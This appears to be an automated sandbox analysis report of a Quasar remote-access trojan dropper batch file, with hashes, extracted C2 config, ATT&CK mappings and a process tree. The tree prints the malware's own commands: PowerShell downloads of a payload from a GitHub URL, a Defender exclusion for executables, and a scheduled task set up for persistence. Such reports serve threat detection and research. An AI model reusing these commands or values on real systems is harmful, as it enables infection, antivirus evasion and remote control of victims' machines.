quasar | 57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7

General

Target

main.bat
Size

15KB
MD5

837e6e693eab2459822a681dd8829347
SHA1

77417d665e66ae2f962f52b3d7c916f0772f0615
SHA256

57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7
SHA512

54f3d0f4a69d785dd6012f5376d131f3d4cdfa1885577c46468bf1e37aed1d7da86cc11b7efcddf53eede8a4803a16e14c008493404906e3b870ccd441278a48
SSDEEP

384:wK1+KSlKC8kumFq/vM2pHz6YBM3P6QDSJO4ytvJ2/N2cGTuEhckk7VgFHbWvaPn0:wK1+KSlKC8++vM23b+CJXPn

Score

10^/10

quasar bot defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes

encryption_key
E83D6FC31962786DAEA703F111D2381786DF06CA
install_name
Modification1.5.14.12.exe
log_directory
Logs
reconnect_delay
3126
startup_key
explorer.dll
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe	family_quasar
behavioral1/memory/560-47-0x0000000000960000-0x0000000000C84000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

2 3924 powershell.exe
4 1740 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3924 powershell.exe
1740 powershell.exe
3516 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

pid process

560 Modification11910275.exe
1976 Modification1.5.14.12.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
2 raw.githubusercontent.com
4 raw.githubusercontent.com

flow	pid	process
2	3924	powershell.exe
4	1740	powershell.exe

pid	process
560	Modification11910275.exe
1976	Modification1.5.14.12.exe

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com

Drops file in System32 directory 5 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

description	ioc	process
File created	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification1.5.14.12.exe
File opened for modification	C:\Windows\system32\SubDir	Modification1.5.14.12.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
defense_evasion

Ignore Process Interrupts
T1564.011

Processes:

powershell.exe

pid process

5020 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

4456 PING.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4456 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2484 schtasks.exe
4356 schtasks.exe

pid	process
5020	powershell.exe

pid	process
4456	PING.EXE

pid	process
4456	PING.EXE

pid	process
2484	schtasks.exe
4356	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3924	powershell.exe
3924	powershell.exe
3516	powershell.exe
3516	powershell.exe
1740	powershell.exe
1740	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process
Token: SeDebugPrivilege	3924	powershell.exe
Token: SeDebugPrivilege	3516	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	560	Modification11910275.exe
Token: SeDebugPrivilege	1976	Modification1.5.14.12.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Modification1.5.14.12.exe

pid process

1976 Modification1.5.14.12.exe

pid	process
1976	Modification1.5.14.12.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

cmd.execmd.exeModification11910275.exeModification1.5.14.12.execmd.exe

description	pid	process	target process
PID 1592 wrote to memory of 3924	1592	cmd.exe	powershell.exe
PID 1592 wrote to memory of 3924	1592	cmd.exe	powershell.exe
PID 1592 wrote to memory of 3408	1592	cmd.exe	cmd.exe
PID 1592 wrote to memory of 3408	1592	cmd.exe	cmd.exe
PID 3408 wrote to memory of 3764	3408	cmd.exe	cacls.exe
PID 3408 wrote to memory of 3764	3408	cmd.exe	cacls.exe
PID 3408 wrote to memory of 3516	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 3516	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 1740	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 1740	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 560	3408	cmd.exe	Modification11910275.exe
PID 3408 wrote to memory of 560	3408	cmd.exe	Modification11910275.exe
PID 3408 wrote to memory of 5020	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 5020	3408	cmd.exe	powershell.exe
PID 560 wrote to memory of 4356	560	Modification11910275.exe	schtasks.exe
PID 560 wrote to memory of 4356	560	Modification11910275.exe	schtasks.exe
PID 560 wrote to memory of 1976	560	Modification11910275.exe	Modification1.5.14.12.exe
PID 560 wrote to memory of 1976	560	Modification11910275.exe	Modification1.5.14.12.exe
PID 1976 wrote to memory of 2484	1976	Modification1.5.14.12.exe	schtasks.exe
PID 1976 wrote to memory of 2484	1976	Modification1.5.14.12.exe	schtasks.exe
PID 1976 wrote to memory of 2472	1976	Modification1.5.14.12.exe	schtasks.exe
PID 1976 wrote to memory of 2472	1976	Modification1.5.14.12.exe	schtasks.exe
PID 1976 wrote to memory of 5060	1976	Modification1.5.14.12.exe	cmd.exe
PID 1976 wrote to memory of 5060	1976	Modification1.5.14.12.exe	cmd.exe
PID 5060 wrote to memory of 4140	5060	cmd.exe	chcp.com
PID 5060 wrote to memory of 4140	5060	cmd.exe	chcp.com
PID 5060 wrote to memory of 4456	5060	cmd.exe	PING.EXE
PID 5060 wrote to memory of 4456	5060	cmd.exe	PING.EXE

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K installer.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3408
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:3764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Set-MpPreference -ExclusionExtension exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
    Modification11910275.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4356
  - - C:\Windows\system32\SubDir\Modification1.5.14.12.exe
      "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1976
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2484
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /delete /tn "explorer.dll" /f
        5⤵
        
        PID:2472
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIBDcHRbDwx3.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5060
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:4140
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-Process cmd -ErrorAction SilentlyContinue | ForEach-Object { $_.Kill() }"
    3⤵
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Hide Artifacts

1

T1564

Ignore Process Interrupts

1

T1564.011

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2c99718f7a80a0d6647e3956d1e34a34

SHA1
bd3ce4a8cc86d6ca1f235cd9488898c3c4f2c9dc

SHA256
a358ae50ff760a1515b8181ffcbea3eef84008b58e4743fe59bd0a6d645cc6f6

SHA512
cabc89afe579eeab0278eac5821f9a360787bc7445f73970e009eff4a54839cf5462164aac6b753798c1553fc55026c7951aae55cfadc0c1b31e58631a980ef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9e68c1bb9832123a59574b127287b943

SHA1
a29e81c30035b785ad367704eb374f015f706ee5

SHA256
b58864e3e01d1de705ecc0e58a8a408ba0fe49064fa12a7a019c0a0016daea83

SHA512
136ce699b3ed48af3ef61ae4bdec62d4f16d9f0cb108a8ed7cb774f8c82a76fb2ac5b42e408af1126a13e8178ce877a8d4a9cc908a759036a34cf7b57ceb2739

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2e667c9f2e92c923ef35097c883ad231

SHA1
4517d71962cfbd44cbc1f4326ded520a62b3009e

SHA256
853a78b7b2fc583b2cdd787459c884f04111d3a097d39ba21805405de06a063a

SHA512
16efdc0669cc1683a435f92de60044fb59775d66e7c93274eff98eb0e02a2e7d3879a0614d94fa38dec241602dce4db19126cdc15533608a1d4dd6de0f5e82c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe

Filesize
3.1MB

MD5
fa9b1524e725c4a251d07007f15fa947

SHA1
5c023619d8180b611acb544fa1cd8bd31de9e61c

SHA256
0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec

SHA512
dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhgkblbb.gm5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fIBDcHRbDwx3.bat

Filesize
215B

MD5
1957d7c853373cf37cff642fcae799d5

SHA1
48442dde52b999f1c442ae59c769e019b55b8acc

SHA256
e615c28430bdfa142502df6945e485eefd0cd272d48629c90ccb4e72f2025c8d

SHA512
6355a6d2193c0e3496d9abe583a88bc588e8caa0d22fa5a6b9a816d84d5b8e492adf3be350f12990efab6226a36d6204e46023fecd5f5e7ba7857dfbf2d7e107

Download Submit
C:\Users\Admin\AppData\Local\Temp\installer.bat

Filesize
1KB

MD5
43bd9a829d434583f1c14da28dca72f6

SHA1
8fac8d694f4c15d42458bdc5540e0547cb88c83c

SHA256
be6d97cbf700b60bb57bf24889af41c0e3e4d3c70800bc164ef71a0608beb6df

SHA512
2bbb73cf8c2a6d0e61ec58b2a125240daf73c87742f377fc2aede5ce24e11f492044b47c98918168148c632b2c4f3f058feef45479265dd51951aac8ceb585da

Download Submit
memory/560-47-0x0000000000960000-0x0000000000C84000-memory.dmp

Filesize
3.1MB

Download
memory/1976-64-0x000000001B600000-0x000000001B650000-memory.dmp

Filesize
320KB

Download
memory/1976-65-0x000000001BE20000-0x000000001BED2000-memory.dmp

Filesize
712KB

Download
memory/1976-70-0x000000001E010000-0x000000001E538000-memory.dmp

Filesize
5.2MB

Download
memory/1976-69-0x000000001C930000-0x000000001C96C000-memory.dmp

Filesize
240KB

Download
memory/1976-68-0x000000001BD90000-0x000000001BDA2000-memory.dmp

Filesize
72KB

Download
memory/3516-32-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3516-20-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3516-19-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3516-21-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3924-12-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3924-11-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3924-10-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3924-0-0x00007FF88ED33000-0x00007FF88ED35000-memory.dmp

Filesize
8KB

Download
memory/3924-16-0x00007FF88ED30000-0x00007FF88F7F2000-memory.dmp

Filesize
10.8MB

Download
memory/3924-9-0x0000021472F30000-0x0000021472F52000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads